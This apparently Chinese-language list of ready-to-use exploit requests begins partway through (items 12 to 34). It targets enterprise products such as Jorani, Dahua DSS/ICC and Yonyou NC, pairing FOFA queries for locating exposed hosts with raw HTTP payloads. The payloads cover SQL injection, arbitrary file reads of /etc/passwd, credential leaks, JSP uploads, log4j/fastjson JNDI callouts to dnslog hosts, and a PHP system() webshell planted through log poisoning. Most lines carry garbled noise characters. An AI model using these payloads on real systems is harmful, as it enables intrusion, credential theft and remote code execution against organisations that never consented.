% ]& X0 s) s3 [ yFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台"' s0 ~- j3 N. O9 \4 Z' B
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
1 \) ~4 p3 _ c- I( W" M+ f& E. XHost: 127.0.0.1
" i& c9 g* F6 Z2 z }# b& m+ uPragma: no-cache8 d# x: H# ^, B" f [
Cache-Control: no-cache
" v# w4 z( [% X* CUpgrade-Insecure-Requests: 13 j, x8 A. r! p6 m3 \' ]! t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
4 I; g5 c6 {2 ~5 U- y7 |5 W# {Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.78 H- G3 R3 a8 |# M4 C/ B6 W
Accept-Encoding: gzip, deflate+ f! V1 R% ~- v7 {; [) t, J
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
# t8 b5 _4 c1 z1 P# x4 o9 pConnection: close9 D( u) I) f; Q/ `
( O! Z% b+ K$ {! i+ i1 u4 g
# P, ^5 q; V* b* k# L d9 m4 y12. Jorani < 1.0.2 远程命令执行* e) m6 x) e: |8 z; |9 j
FOFA:title="Jorani"# O$ b. h' C' O( k
第一步先拿到cookie
% |: |# L3 n! u. w1 h7 {6 _GET /session/login HTTP/1.1# P% c8 B. |, x& g- _4 D, A
Host: 192.168.190.309 v& P' h, j. L: v
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36$ k) a! ]7 Z8 _. Z# q" @8 }
Connection: close: p f" ^9 X) O
Accept-Encoding: gzip
6 O8 ?" V$ y: Z4 k% n4 T8 J5 j: ]( k7 H
: E( s! g6 P0 c5 p0 x1 f* C
响应中csrf_cookie_jorani用于后续请求4 D& w% e- S8 J% X% h$ F
HTTP/1.1 200 OK
" {5 b- W% Y& E/ S/ y- o7 pConnection: close- K- T& t3 z- S. T& E
Cache-Control: no-store, no-cache, must-revalidate
( E$ t* I7 e9 D: l1 u7 |Content-Type: text/html; charset=UTF-8* l5 L) y& y. G
Date: Tue, 24 Oct 2023 09:34:28 GMT+ V& l* N& j% d, t' b
Expires: Thu, 19 Nov 1981 08:52:00 GMT
! a! c E$ \( {/ d$ @' e+ _Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
- ~' O' P! \: ePragma: no-cache/ ^+ l9 n$ `% u' n
Server: Apache/2.4.54 (Debian)4 f6 X6 h3 ~% W4 s6 @* h# K6 T
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/. W) Y# u6 A- B* U- [% H$ k
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly9 h3 F: P* c) I' m- t9 q9 _& A) P
Vary: Accept-Encoding' f' C% H+ v5 y& z9 y( o- W
8 A* t: T' D% N0 y; M, H- R! E2 W6 h4 L& `) @
POST请求,执行函数并进行base64编码
2 I' A8 f5 u. t2 KPOST /session/login HTTP/1.1
7 @6 s4 H P) ~; P: J; q0 x7 wHost: 192.168.190.30
; `7 j* U) z0 c- C) v3 g3 Y( mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
. U4 K8 j1 Y/ S; G( r: Q; rConnection: close4 Q9 P% n3 }" L9 l9 P
Content-Length: 252
8 M3 f4 Y7 v2 }7 I5 W% E( \Content-Type: application/x-www-form-urlencoded
7 S9 |7 w/ E+ e8 Z9 N' QCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r0 B9 m& {+ T9 H
Accept-Encoding: gzip
, i9 v l4 v7 C( k# R( }1 t7 k5 `# x1 M# n
csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor
: {! X- T" D+ E* k- g) s5 u3 y. ^% s. n4 a; ~
+ d; }9 `6 h; N1 p
; {' M6 {1 [1 T! u( d# o# W! ^8 w
向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串) ]- B( g* o j- |' v2 |% q
GET /pages/view/log-2023-10-24 HTTP/1.1
) r8 s1 C$ _/ T) p8 Z7 pHost: 192.168.190.30
7 x1 C2 z9 l. }; M9 kUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
" R0 S+ R- I: @9 d9 v. }Connection: close
4 o$ V/ k! x. x, E: t7 jCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
' U3 P& L5 {# sK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=, R3 ~3 p! p% u9 ~
X-REQUESTED-WITH: XMLHttpRequest2 P6 }: i, A! f2 p0 X' R* y
Accept-Encoding: gzip
3 N }) [5 }4 M0 L/ J1 {" l2 p! x% }5 N# `
! q5 }! @7 N: o! }5 J13. 红帆iOffice ioFileDown任意文件读取
2 ?$ o1 k& Z B, L/ d/ OFOFA:app="红帆-ioffice"; _, p0 R% x9 T* K' y. h
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
; n% _; w- Z. S+ X7 W' UHost: x.x.x.x5 g5 e1 {! A5 L, a
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
* l( Z* E6 |- f+ u0 ^Connection: close: K! k/ c+ c T5 T a
Accept: */*" `+ T, I) u# C' f3 ]; p$ W% V
Accept-Encoding: gzip8 J6 A! f1 i) {& ?% C! D. W) H; f5 Q
2 q+ ^: n6 j$ `9 |# G
7 K) X0 W7 }! ?7 T3 i* N# o0 y: j
14. 华夏ERP(jshERP)敏感信息泄露0 M& H0 }6 F( [. Z' ]' P
FOFA:body="jshERP-boot"
) |9 t& b& p# M/ L; T0 C, T泄露内容包括用户名密码9 \$ _8 F$ X2 N% Q5 {! k+ D- U
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
/ ]) C( k' `' j" O; }# QHost: x.x.x.x! T* J" B9 r0 C# g( F
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
1 [; s4 f4 Y: J- O) h' b# g1 P# @& G. xConnection: close
6 q- ?$ p v" _4 v3 TAccept: */*
. z2 H# S8 d6 F. qAccept-Language: en
7 l0 \3 z, M0 l7 Q/ u5 u- uAccept-Encoding: gzip) x7 I& u4 [' R# f: A4 W
. j$ y8 n, @8 M2 F5 T+ }
5 n, s/ a- j! i% H1 p6 Y15. 华夏ERP getAllList信息泄露: I4 k0 Y& p9 v5 J0 u8 O, P
CVE-2024-04904 T3 h3 c1 O$ m' d: t( |
FOFA:body="jshERP-boot"& }: R2 b! X" I6 I( U
泄露内容包括用户名密码( x' ?. d: a4 n6 J- Z6 e
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.11 ^* Z6 ?1 `/ d$ v7 |; ]6 w( l
Host: 192.168.40.130:1006 @8 s# K# N% w5 F( w
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
" I: S3 a' U# m$ G* F7 [Connection: close+ g9 v0 |( y; L* I% J# u2 U
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
E$ w7 I2 U5 ]+ l0 X9 D. l, HAccept-Language: en
/ q+ l, `' V' W* }; }- Ysec-ch-ua-platform: Windows
! P0 Y# S8 s0 V7 J1 {$ e% d. w2 g4 BAccept-Encoding: gzip
( ^2 [5 ^. n6 [1 e$ }+ ?4 R! z
! M6 n+ x/ d+ x8 y A; @: S$ |5 Y R: c
16. 红帆HFOffice医微云SQL注入
6 F. A* [6 V v: DFOFA:title="HFOffice"9 C, }1 J4 q7 C& {
poc中调用函数计算1234的md5值
# T+ x8 z3 O* z# ~GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1: ?! X, b1 h. |5 t X/ G; `: v( C3 o
Host: x.x.x.x
) E+ \ \2 I! Q- YUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36* t; V6 u" i6 f$ i/ v% W
Connection: close1 O Y9 c. E, V( n
Accept: */*: v0 J& T" @) M6 J
Accept-Language: en
) Q( V/ ?5 |) N( l0 E5 YAccept-Encoding: gzip
2 G3 a4 f& s5 o# p$ L4 U G: k* |9 j8 U
2 }2 ]/ g' N) k3 L. W w$ @17. 大华 DSS itcBulletin SQL 注入* H1 P$ Y& l: w- l9 j
FOFA:app="dahua-DSS"( u# x+ P' g: v6 R$ P3 H) S
POST /portal/services/itcBulletin?wsdl HTTP/1.1/ e: `8 X( n l/ ?# m5 v% i
Host: x.x.x.x
7 z0 E& v; |7 X8 C. h" D' P) OUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15. |5 o k. x2 b# m1 D; A6 u; G
Connection: close+ ~' ]! K& b4 e' D4 z5 y$ L
Content-Length: 345
# D" I& i% e. r8 `; iAccept-Encoding: gzip
, ~ E2 U+ n7 A$ M& f: s
; q/ N$ |7 O' a3 I% g8 |. S<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
0 F9 ?( t. u2 P w9 |' i# B+ U4 f<s11:Body>) l) K* J5 L0 Y8 s
<ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
( K/ {7 g, D! e( q* Z <netMarkings>! g c& \: Q+ Y" R1 F
(updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
" f# e8 A6 A9 P. W( L( v" g: Q </netMarkings>3 o1 S- C5 ~" n/ Y* Y' l
</ns1:deleteBulletin>
% h$ F% w2 {! f1 Z9 x% V </s11:Body>
, o/ w9 o9 j: H) V: i* ], N' e</s11:Envelope>
# D/ [ E9 T* E4 u/ ?
! \& q/ ?" l9 U& ]/ ?& J5 i) l9 F9 Y- Y2 k( U$ N5 w
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露* B& b0 F' }( o! R
FOFA:app="dahua-DSS"
+ |( B% b0 F: L+ B; \1 {GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
- z; I3 Q, A q, P! pHost: your-ip
% a0 ]4 D, {% s% L) UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
1 Y& l6 U+ R, Q1 E/ i5 uAccept-Encoding: gzip, deflate3 U5 v. l: D3 t! I9 v, C0 b( k
Accept: */*
( A' Z+ G# g7 T% Q! i" q! AConnection: keep-alive
( F: W2 t; ~# I4 |; |$ m M, E+ \3 L& z
, W) L% b0 |$ y4 o' f+ W% _/ `
, Q9 a1 n8 b( R$ u# W$ k0 w19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
+ M' m$ C: ~8 v" NFOFA:app="dahua-DSS"% y' I' e6 g3 |' J( @% w# @
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
2 {3 K/ Q$ H/ o; S3 `4 k% BHost:
, ~. b' p0 T( M+ j, W; jUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36. ?& @. z X: T- e9 N0 n! }* |
Accept-Encoding: gzip, deflate$ q- x: {0 L- W
Accept: */*
! c$ F' U* l! G- s% F, X. @4 ZConnection: keep-alive
% I9 [1 \8 U- w0 o" y9 r$ M5 ?$ v& `6 `. z0 B( D" O: M& ~ j/ o% L
2 k- ~+ l" T/ b, F0 f20. 大华ICC智能物联综合管理平台任意文件读取
: N. O' O) [4 s* Z7 a7 O) u: t4 NFOFA:body="*客户端会小于800*"
6 d5 D* F, T" O- \GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
s" q. ^. w6 ]3 _0 @. ?Host: x.x.x.x
4 \1 T: ^% Q$ N6 X$ Q% }User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36- h2 h! O% }5 P3 R' u/ W. |3 q( `
Connection: close
, Q3 k g0 b4 k# y# G+ l P2 mAccept: */*
: l |% L8 y- b) U+ N( U- ^Accept-Language: en* j: h1 p4 \! e
Accept-Encoding: gzip, E" h3 n3 q9 j
+ u- X Z; H9 |& e6 H: j L& X7 B
21. 大华ICC智能物联综合管理平台random远程代码执行# V' J3 A V6 T! e. m1 u
FOFA:icon_hash="-1935899595"
6 a( K7 b8 F0 e6 V3 _% J1 e5 EPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1/ U# C$ t+ ~1 Y6 ?# r, G( n0 J
Host: x.x.x.x
g: R+ o1 z1 r r8 {5 ~User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
+ H% L0 r* ^, T! nContent-Length: 161! p5 J Q6 S% Q
Accept-Encoding: gzip
P0 S* y* Z- P6 `8 w$ PConnection: close
3 ~# C3 W, `! J6 @% Q7 S; AContent-Type: application/json;charset=utf-8
7 {# g+ a: @* v2 _; y& m( q" z: x. \: j: h5 h& S
{
. [( `( g; }& b"a":{0 p& b, U1 E) K5 a# @, ~' o
"@type":"com.alibaba.fastjson.JSONObject"," C; `6 ]( f/ {. I7 w4 U
{"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
# A* k* i9 X8 [1 ]) P$ M( M1 \- F }""
8 j9 K4 g# x3 H+ p+ M} e C' ?" Z, f1 b" Q- l
7 J& v* y( ]- H5 \9 y' B, P
$ n# k) ?# `9 _* c, E22. 大华ICC智能物联综合管理平台 log4j远程代码执行2 [/ U! h7 O' d6 s7 ?% P) i5 u
FOFA:icon_hash="-1935899595"
/ o' I" N$ y* |- bPOST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1, H) n. b( |3 @) B7 P% {
Host: your-ip" {% U6 @1 a x9 b* n" o- }
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36; B; u8 E% O" u& K# v7 U* C4 `2 w
Content-Type: application/json;charset=utf-8% D* M% u) R! W9 [+ {. W
( {4 L9 C+ F9 g+ N: e{
5 O/ |# V3 l, j' V' `"loginName":"${jndi:ldap://dnslog}"& }5 G I7 Z& `2 n/ g
}
& B3 q; V) o+ Y e/ Y" L2 i: J `$ Y( V7 g3 V* i& l
2 X6 |! e. q+ K5 X1 O6 R& v7 W" P6 o! C& P* t5 y* W$ b
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行
, X3 x0 }& @* T+ ^/ E/ tFOFA:icon_hash="-1935899595"
% w9 |% f+ ^9 w1 a. QPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
. @4 ~2 U; t9 \ UHost: your-ip
: [: p- T5 F- O1 N, b* T+ }# JUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( y3 L' G; x5 R" B% v, a; E8 S
Content-Type: application/json;charset=utf-8
) |: B3 ~/ {! m/ f* Y( IAccept-Encoding: gzip6 `* h6 w5 g" F' P) F- S0 C4 b
Connection: close% t. H( B; I% V; o4 D- d
7 M' i# A5 h. F$ K! o6 z! ]/ a" B{+ x( V5 g2 j' \$ C2 ]
"a":{
1 F4 ~' [- e# q7 K; E "@type":"com.alibaba.fastjson.JSONObject",
2 a4 k# L6 ]2 _8 X' [% D8 } {"@type":"java.net.URL","val":"http://DNSLOG"}
3 l# a6 K! k' H }""
) h; q/ ~- x r3 K}! t% I4 c- ~8 T0 H% ^1 o
8 r6 m! f3 n+ @& r, r! ?5 d
q: D) r4 P9 S& k* j7 T24. 用友NC 6.5 accept.jsp任意文件上传7 S1 X1 x: W/ W7 Q# v* u/ t
FOFA:icon_hash="1085941792"
& K' q8 t- _) XPOST /aim/equipmap/accept.jsp HTTP/1.1
+ O" Y: u5 W1 }: Z. R5 t& O1 tHost: x.x.x.x
& r# ?/ [8 G( |User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
) O9 `6 v+ x% |( V" iConnection: close
- D h; r& k7 Z/ DContent-Length: 449- B9 C# _" Y. u- p0 `
Accept: */*8 H+ n& p# e7 A8 G1 Z, O: G. E/ B
Accept-Encoding: gzip
& \0 O! {: i9 g4 y1 c# DContent-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
/ s; B% ]. y5 ^1 |' h. }+ b
$ Y2 S7 m: ^' H-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
: L, w/ f, p. {" L8 w: Y# PContent-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"' j; R! w! j! a+ y, f
Content-Type: text/plain- j- E n& v5 p, o. z
7 Y; ]. D3 W: c# A6 W. b<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
0 N5 e9 c0 y4 F. Q* w+ z2 |-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
) D$ Q& a3 E+ B! ]7 w+ s7 hContent-Disposition: form-data; name="fname"% P. @# k* [. j
' O. d( a0 S( E" B, z: @# N! k
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp b/ z4 t7 M/ T# ?) ~- y
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
# G! U7 }2 H" J4 X& o! G
; L7 i+ e; D* p) P4 z- z C$ t
+ X7 Z1 P2 W8 v) b5 E* z25. 用友NC registerServlet JNDI 远程代码执行
! M4 C. b# h+ s0 ^6 g# |' H) |8 [; j( sFOFA:app="用友-UFIDA-NC"
1 G: I1 v; T0 h: hPOST /portal/registerServlet HTTP/1.1+ N0 P, s+ D5 c
Host: your-ip3 I9 |5 O9 z# V# Y+ A0 M; k( a
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
8 J+ |1 R1 y" H: Q# b2 V5 VAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
# o+ ?# ^. U3 p! H& c' f# D: tAccept-Encoding: gzip, deflate- b2 P& M: ~7 H5 C: P# D3 z
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
! }5 y% h% }$ z: T2 \Content-Type: application/x-www-form-urlencoded
9 B' i2 v1 j0 s' E5 |" z
( D% U, T6 y% |+ Q/ w0 M/ Qtype=1&dsname=ldap://dnslog Z7 i) b+ s9 v' k/ t
4 n! J0 B5 Z. u4 F% T
9 H) z3 ?* q3 ~5 J6 V
' S# X# y& q: ?& S6 m' O26. 用友NC linkVoucher SQL注入
9 g3 W. u: V! z! q# }FOFA:app="用友-UFIDA-NC"2 l: a& ~: |6 F H
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
6 g4 [2 y$ Y5 Y7 b; k- xHost: your-ip
) J1 L" H/ X5 u- H* T) z2 X* K8 HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
+ o( v( d# V1 X( `: ?# RContent-Type: application/x-www-form-urlencoded
2 |2 h: o- e) ?/ MAccept-Encoding: gzip, deflate
' E W7 k4 k- @2 B0 U" R; rAccept: */*5 ?3 Q' z+ k; e5 {: l. o
Connection: keep-alive
: `0 V8 W+ A/ _; d; D1 c2 s+ {( q
' r0 n6 Z# p/ K: Z6 }6 [0 _27. 用友 NC showcontent SQL注入
& E2 e3 k- r; sFOFA:icon_hash="1085941792"8 O( |+ s2 `9 B
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
+ P1 ?7 H @) H% ] L$ k: ~" SHost: your-ip
4 X5 T# A) E0 F- u1 P0 ^; xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
, B. x# `# W6 J aAccept-Encoding: identity; k; r# p$ [% q# x8 k3 @
Connection: close! p5 y6 H* T# _9 |6 ?7 H8 z
Content-Type: text/xml; charset=utf-8
- d+ e- M" x- e
* D$ z3 X* s$ r$ x N8 ?) `; p$ x; J' ]& d# N8 l, C( b/ ~6 x
28. 用友NC grouptemplet 任意文件上传
- c& ?8 j/ R' N F) V" Y, m/ tFOFA:icon_hash="1085941792"
J( H7 c- N# V+ k4 T' LPOST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1) b! u. M5 W/ q/ h: c( S; ?0 D
Host: x.x.x.x* o# u @+ @8 r E/ d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.369 J: U+ ~+ m. E- i0 w
Connection: close
9 M& |! N+ }( P& L+ gContent-Length: 2681 d; J$ }( @# q" a7 `5 n ?
Content-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk6 ^- F; k0 |' u1 k' t! U @1 \ P5 D
Accept-Encoding: gzip
' v( [! f" X$ @' R
" b/ s+ ?- }. i$ d+ @------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
- I' V3 C# X( ~' O0 E/ Y+ aContent-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
4 s' I1 |, ~; M" o6 DContent-Type: application/octet-stream4 `3 L4 v. |! l) K) V) V, W/ f
" k+ ^1 f) Q" n+ g% X+ F: q
<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
; `! r, l3 J1 o0 Q1 P------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--# }6 G+ W9 f* J2 N& L- V) F! v
5 s+ U8 K$ T6 Z- n+ w& `- d
* @1 v' r1 a" e% z' O) C2 R5 V& x/uapim/static/pages/nc/head.jsp% m; E9 N0 I7 v
- f/ v, a, |' t+ m: X& ]2 n2 ?/ T
29. 用友NC down/bill SQL注入
N) Q5 [! @ QFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
* a: v* l$ D6 f9 D% E* W4 rGET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
9 v# k0 k: U" F+ Q8 xHost: your-ip1 c$ }5 D6 h9 @5 v/ J
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.364 p) B& y: r' c; n% G; @# |
Content-Type: application/x-www-form-urlencoded+ ]; K6 b# |& [- Y5 N
Accept-Encoding: gzip, deflate
. o% Y' `! u% s5 \0 i! j" sAccept: */*% I; x6 p# a. t( R
Connection: keep-alive0 y4 _: W7 ~% j
2 k; R: P* f" O" r% l5 H/ E# R) e
. f# S" R. u! |' u30. 用友NC importPml SQL注入
5 l- i* I1 ~/ |, Y5 E2 yFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
; ^, p7 e( x* O& _+ F3 I( X! n' @POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
1 @8 I" y/ Y, [' [/ Q; OHost: your-ip
) s, D. Y3 P6 H! i) r2 Z' w5 Y) sContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V6 P- d& u3 O& B" W$ I9 x; u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36& \2 [. C- C0 M2 {" a
Connection: close
1 v. z+ a# _7 ?" m7 I: P4 m" g- c L a' I2 I/ k; B4 p0 Y; X
------WebKitFormBoundaryH970hbttBhoCyj9V7 i! P& D8 x( k$ U( E# N
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
" \+ Y8 ^% {: v( ?" M; n, tContent-Type: image/jpeg& I2 P: L d0 `8 G
------WebKitFormBoundaryH970hbttBhoCyj9V--
; k) I: ?. q& b9 U0 _( G' K6 b( m/ d
3 v+ f; B% q7 [# b' T- {5 [31. 用友NC runStateServlet SQL注入5 G# @0 K& R% C- [4 U1 Y. ~
version<=6.50 e# ?% h/ K( @# W( k$ g# w- ~
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
5 ?; U: ^; G- d0 ]+ UGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1- Y0 n' n d) {* r/ S- x3 c
Host: host
% C# J( V0 h8 T5 w: i+ i. nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
; V+ [ {% l- A! p& g6 TContent-Type: application/x-www-form-urlencoded" n; T4 j+ ?! H" r k- g
3 W; b/ G* B" W5 z! j
3 f3 k* g3 z% |; B- y
32. 用友NC complainbilldetail SQL注入( ~) I M% O" _
version= NC633、NC65; E3 V7 H1 w+ k6 t* s1 F& b
FOFA:app="用友-UFIDA-NC"
# P% ~' i$ j& e3 cGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
M; V5 e% p6 W# C9 sHost: your-ip* e. G7 g# s1 I
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
4 h8 [* n4 U$ ]Content-Type: application/x-www-form-urlencoded
3 L. r# R3 O8 V& p3 {, b- v* D* K3 dAccept-Encoding: gzip, deflate' @* t3 ?( E8 U9 c' h8 q, }! y
Accept: */*% p R0 y# `( a4 }2 y
Connection: keep-alive
- g% ?; R! f' {. ?$ O0 G1 T' T6 R5 g
; r" [: u0 l) ^4 {6 c
1 z* t9 M4 |; W3 h% I9 y& `33. 用友NC downTax/download SQL注入
X/ v# R U# y) S' ]version:NC6.5FOFA:app="用友-UFIDA-NC"
4 t$ u. |- M, \) y9 T1 yGET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.1# u6 r }# ~7 Y4 x0 ?4 t/ s( a
Host: your-ip
" p1 o2 k& Q3 E6 [2 UUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36- a$ C; s% ]6 P- ]7 a, b
Content-Type: application/x-www-form-urlencoded9 R6 W% F A$ s/ g) X
Accept-Encoding: gzip, deflate( L# ]: m. n( d! f7 N& E/ o9 q* d. O
Accept: */*
* S# X) G" A. L/ Y5 f6 }+ R0 qConnection: keep-alive
5 s" C0 C* \ L1 f9 Q+ N$ k0 q/ H1 e8 t/ y, Z# h
1 w6 w0 m4 K4 E3 m/ S8 n; C0 f: }
34. 用友NC warningDetailInfo接口SQL注入+ ]3 ?% f; H3 P5 K. i
FOFA:app="用友-UFIDA-NC"
3 ?+ T6 z1 ?0 ^/ z5 KGET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
7 U* Y5 b. j( K" KHost: your-ip, \- Z9 Q0 \$ H7 z k( i9 c8 h
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36+ G) H8 w" T) H( B. f) [( y+ V
Content-Type: application/x-www-form-urlencoded% Z' D* v0 b4 w Y5 T% J4 `
